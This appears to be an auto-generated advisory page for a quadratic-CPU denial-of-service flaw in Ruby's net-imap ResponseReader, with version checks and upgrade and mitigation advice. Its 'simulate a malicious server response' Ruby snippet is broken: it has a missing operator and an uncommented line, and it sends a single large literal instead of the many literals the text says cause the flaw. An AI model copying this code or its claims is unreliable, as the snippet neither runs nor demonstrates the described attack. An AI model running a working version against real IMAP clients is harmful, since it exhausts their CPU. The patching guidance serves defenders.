Listen to this Post
How the CVE Works
Net::IMAP::ResponseReader has quadratic time complexity when reading large responses containing many string literals. A hostile server can send crafted responses to exhaust client CPU for a DoS attack. For each literal in a response, ResponseReader rescans the entire growing response buffer using a regular expression that runs in linear time. With many literals, this becomes O(n²) total work. The regex should run in constant time because it is anchored to the end and only the last 23 bytes of the buffer are relevant. Due to super‑linear complexity, the protection from max_response_size is bypassed: a response can stay well below the default size limit while still causing very high CPU consumption. ResponseReader runs continuously in the receiver thread until the connection closes. This consumes disproportionate CPU time in the client’s receiver thread. For a response near the default max_response_size, each regex scan can take 100–200ms on modern hardware, repeated up to 200k times per megabyte of response. While scanning, the regex retains the Global VM lock, preventing other threads from running. Although other threads are not fully blocked, their run time is significantly impacted.
DailyCVE Form
Platform: Ruby net‑imap
Version: prior to 0.6.4/0.5.14/0.4.24
Vulnerability: Quadratic CPU DoS
Severity: Low
Date: 2026‑04‑24
Prediction: Patch 2026‑04‑25
What Undercode Say
Check installed version and test vulnerability:
gem list net-imap ruby -rnet/imap -e 'puts Net::IMAP::VERSION'
Simulate a malicious server response:
require 'socket'
server = TCPServer.new('localhost', 1143)
loop do
client = server.accept
client.puts " OK Malicious IMAP"
client.puts " 1000000 LITERAL {1000000}\r\n" + "A"1000000
client.close
end
Connect a vulnerable client to observe CPU spike:
require 'net/imap'
imap = Net::IMAP.new('localhost', 1143, ssl: false)
imap.responses hangs, high CPU
Exploit
A malicious IMAP server sends a response that contains an extremely large number of string literals. The client’s ResponseReader rescans the entire growing buffer for each literal, causing CPU usage to grow quadratically with the number of literals. Because the regular expression scanning retains the Global VM lock, other threads in the application are starved of CPU time, leading to complete denial of service.
Protection from this CVE
- Upgrade net‑imap to a patched version: 0.6.4, 0.5.14, or 0.4.24.
- Do not connect to untrusted IMAP servers.
- When connecting to untrusted servers, set a much smaller `max_response_size` (e.g., 8 KiB). This limits the impact, though it may be too small for fetching large message bodies.
- Monitor CPU usage of IMAP client threads and terminate connections that cause sustained high CPU.
Impact
High CPU consumption in the client’s receiver thread, leading to denial of service. The CPU exhaustion bypasses `max_response_size` limits and can be triggered by a response that remains below the default size limit. The regex scan retains the Global VM lock, heavily impairing the performance of other threads and effectively freezing the application. The vulnerability affects all versions prior to 0.6.4 / 0.5.14 / 0.4.24.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
